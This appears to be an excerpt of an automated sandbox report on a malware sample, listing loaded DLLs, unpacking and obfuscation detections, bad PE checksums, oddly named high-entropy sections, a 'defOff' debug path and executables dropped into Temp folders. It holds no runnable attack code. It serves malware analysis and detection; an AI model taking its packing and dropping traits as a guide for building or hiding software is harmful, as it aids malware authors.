Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2891264 > 1048576
Source: file.exe Static PE information: Raw size of muoxnbrn is bigger than: 0x100000 < 0x298600
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: BF3BS0M5707K28RGW9.exe, 00000006.00000003.2417253737.0000000005010000.00000004.00001000.00020000.00000000.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2550539027.0000000000A32000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Unpacked PE file: 3.2.OLR88CERN7VQFRQ38J.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Unpacked PE file: 4.2.ENORVNMU067PBMHUGECCERYC06W3ZY.exe.4d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Unpacked PE file: 6.2.BF3BS0M5707K28RGW9.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W;zsdjwali:EW;xurnmcxc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Unpacked PE file: 9.2.aae25c676b.exe.e30000.0.unpack :EW;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Unpacked PE file: 10.2.7d61336cf8.exe.a20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Unpacked PE file: 21.2.aae25c676b.exe.e30000.0.unpack :EW;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 30.2.skotes.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Unpacked PE file: 32.2.7d61336cf8.exe.a20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.5.dr Static PE information: real checksum: 0x2c94dc should be: 0x2c25f9
Source: num[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: num.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 7d61336cf8.exe.5.dr Static PE information: real checksum: 0x1ce0d1 should be: 0x1c4e20
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: real checksum: 0x1dbe5c should be: 0x1d8df2
Source: aae25c676b.exe.5.dr Static PE information: real checksum: 0x2c94dc should be: 0x2c25f9
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: real checksum: 0x1ce0d1 should be: 0x1c4e20
Source: file.exe Static PE information: real checksum: 0x2c94dc should be: 0x2c25f9
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x1ce0d1 should be: 0x1c4e20
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1dbe5c should be: 0x1d8df2
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: real checksum: 0x2b72de should be: 0x2b0668
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: muoxnbrn
Source: file.exe Static PE information: section name: ckkqhetw
Source: file.exe Static PE information: section name: .taggant
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: .idata
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: toioyzgt
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: nacjdqiu
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: .taggant
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .rsrc
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .idata
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: iadgvtjq
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: xuvqjoqm
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .taggant
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name:
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: .idata
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: zsdjwali
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: xurnmcxc
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: toioyzgt
Source: skotes.exe.3.dr Static PE information: section name: nacjdqiu
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .rsrc
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: random[1].exe.5.dr Static PE information: section name: muoxnbrn
Source: random[1].exe.5.dr Static PE information: section name: ckkqhetw
Source: random[1].exe.5.dr Static PE information: section name: .taggant
Source: aae25c676b.exe.5.dr Static PE information: section name:
Source: aae25c676b.exe.5.dr Static PE information: section name: .rsrc
Source: aae25c676b.exe.5.dr Static PE information: section name: .idata
Source: aae25c676b.exe.5.dr Static PE information: section name: muoxnbrn
Source: aae25c676b.exe.5.dr Static PE information: section name: ckkqhetw
Source: aae25c676b.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: iadgvtjq
Source: random[1].exe0.5.dr Static PE information: section name: xuvqjoqm
Source: random[1].exe0.5.dr Static PE information: section name: .taggant
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .rsrc
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .idata
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name: iadgvtjq
Source: 7d61336cf8.exe.5.dr Static PE information: section name: xuvqjoqm
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05591000 push cs; retf 0_3_05591052
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0100B261 pushad ; ret 0_3_0100B271
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BBE849 push eax; mov dword ptr [esp], 1FFF0D71h 6_2_00BBE885
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BBE849 push 7E23A34Eh; mov dword ptr [esp], edi 6_2_00BBE8B6
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BBE849 push edi; mov dword ptr [esp], 78796393h 6_2_00BBE8DA
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD50BD push eax; mov dword ptr [esp], ecx 6_2_00BD5335
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD50BD push 124AFC5Bh; mov dword ptr [esp], esi 6_2_00BD533D
Source: file.exe Static PE information: section name: entropy: 7.981854671595565
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: entropy: 7.979892252355736
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: toioyzgt entropy: 7.953146001385448
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: iadgvtjq entropy: 7.954098168517312
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: entropy: 7.798959629767368
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.979892252355736
Source: skotes.exe.3.dr Static PE information: section name: toioyzgt entropy: 7.953146001385448
Source: random[1].exe.5.dr Static PE information: section name: entropy: 7.981854671595565
Source: aae25c676b.exe.5.dr Static PE information: section name: entropy: 7.981854671595565
Source: random[1].exe0.5.dr Static PE information: section name: iadgvtjq entropy: 7.954098168517312
Source: 7d61336cf8.exe.5.dr Static PE information: section name: iadgvtjq entropy: 7.954098168517312
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Jump to dropped file
